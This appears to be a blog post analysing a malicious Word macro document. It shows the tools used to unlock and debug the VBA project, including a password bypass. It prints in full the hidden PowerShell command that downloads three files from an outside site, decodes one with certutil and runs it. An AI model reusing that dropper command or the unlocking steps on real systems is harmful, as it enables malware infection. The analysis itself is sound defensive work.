Word Macro Malware Analysis

Hash: 98fe0b166f550446cbf9e0f368eb8bea79d2eec29fa033cee1ff8f8e38a12836

Sample Download Source: beta.virusbay.io

File Type: Microsoft Word Document

File Format: .doc

VirusTotal Scrore: 32/62

Document Preview:

File Property:

cmd> olemeta.py <filename>

Blg16_08052020_8

Document Macro Analysis:

cmd> olevba.py -a <filename>

Document_Open macro executes on opening document.

Blg16_08052020_1

The first thing I was trying to access Macro. By default it was disabled, to enable it go to Files > Options > Trust Center > Macro Settings > Select Enable all macros and select checkbox Trust access to the VBA project object mode

Post enabling macro, I navigate to View > Macros > View Macros 

There are macros in document.

Blg16_08052020_10

I tried to step into Document_Open macro which executes on document open. But I got an error Project Locked and Project is unenviable.

Blg16_08052020_11

To make it viewable, I downloaded tool EvilClippy. This tool create new copy of word document in same directory as your current document.

Now when I open document which is project viewable and open VBA Development tool by pressing F11 and tried to open macro code, I was getting Project Password prompt.

Blg16_08052020_13

To remove/bypass this password, there is a VBA code, Git hub link

I am going to create a new module and paste this code there and run the macro unprotected

Blg16_08052020_14

Debugging Macro

I started debugging macro code and found below code runs PowerShell command

PowerShell that written to location C:\Users\<profile>\AppData\Roaming\Temp\

PowerShell command that executes via command line.

powershell -windowstyle hidden -command Import-Module BitsTransfer; Start-BitsTransfer -Source http://neoneo-bg.site/hIeak.dat,http://neoneo-bg.site/geTask.dat,http://neoneo-bg.site/rTTj.dat -Destination \"$env:TEMP\vido.com\",\"$env:TEMP\sfera\",\"$env:TEMP\rTTj.com\"; Set-Location -Path \"$env:TEMP\"; certutil -decode sfera po15p; Start-Process vido.com -ArgumentList po15p

 

PowerShell connects to the below URLS and save files vido.com, rTTj.com and sfera to location C:\Users\<user>\AppData\Local\Temp

I tried to debug the PowerShell script but the URL is no more accessible. Sadly, I couldn’t download the files those gonna download by this script.

 

http://neoneo-bg.site/hIeak.dat

VirusTotal Score: 5/71

http://neoneo-bg.site/geTask.dat

VirusTotal Score: 7/71

http://neoneo-bg.site/rTTj.dat

VirusTotal Score: 5/71

 

Summary:

  • On opening document, word macro executes PowerShell command.
  • PowerShell command downloads file to Temp folder.

 

Thank you. Please post comments for suggestions.

Article Link: https://malwr-analysis.com/2020/05/15/word-macro-malware-analysis/